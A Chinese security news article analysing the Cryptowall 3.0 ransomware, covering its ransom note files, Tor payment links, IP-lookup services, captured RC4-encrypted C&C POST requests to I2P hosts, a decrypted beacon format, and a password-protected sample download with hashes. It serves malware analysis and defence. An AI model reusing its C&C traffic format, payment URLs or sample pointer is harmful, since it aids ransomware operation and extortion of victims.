FreeBuf已经报道过不计其数的勒索软件,而最近研究人员又发现了一款特别的——它使用I2P匿名网络进行通信,名为Cryptowall 3.0。
一天感染288个用户
来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯,在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。
微软提供的数据显示从1月11日至1月12日一天时间里,Cryptowall感染了288个用户。
相较之前的变种,软件在用于勒索的提示文件的文件名上有少许变化:
HELP_DECRYPT.HTML
HELP_DECRYPT.PNG
HELP_DECRYPT.TXT
HELP_DECRYPT.URL
贴心的用户体验
以下则是HELP_DECRYPT.PNG的内容:
该款勒索软件十分贴心,HELP_DECRYPT.PNG语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG:
针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接:
http://paytoc4gtpn5czl2.torforall.com/1c3L59z
http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z
软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后,免费解密一个文件似乎要变成行业标准了,CryptoWall 3.0也附带了这一功能:
软件使用以下服务获取IP:
"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"
I2P协议传输
与C&C服务器的通讯似乎是通过Rc4加密了,并且数据通过i2p协议传输:
————–数据稍经修改——-
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p
v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
—————数据稍经修改——-
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p
z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
————————————————–
经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数)
z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}
样本下载
Cryptowall_3.0.zip,密码:infected
文件应包含6c3e6143ab699d6b78551d417c0a1a45和47363b94cee907e2b8926c1be61150c7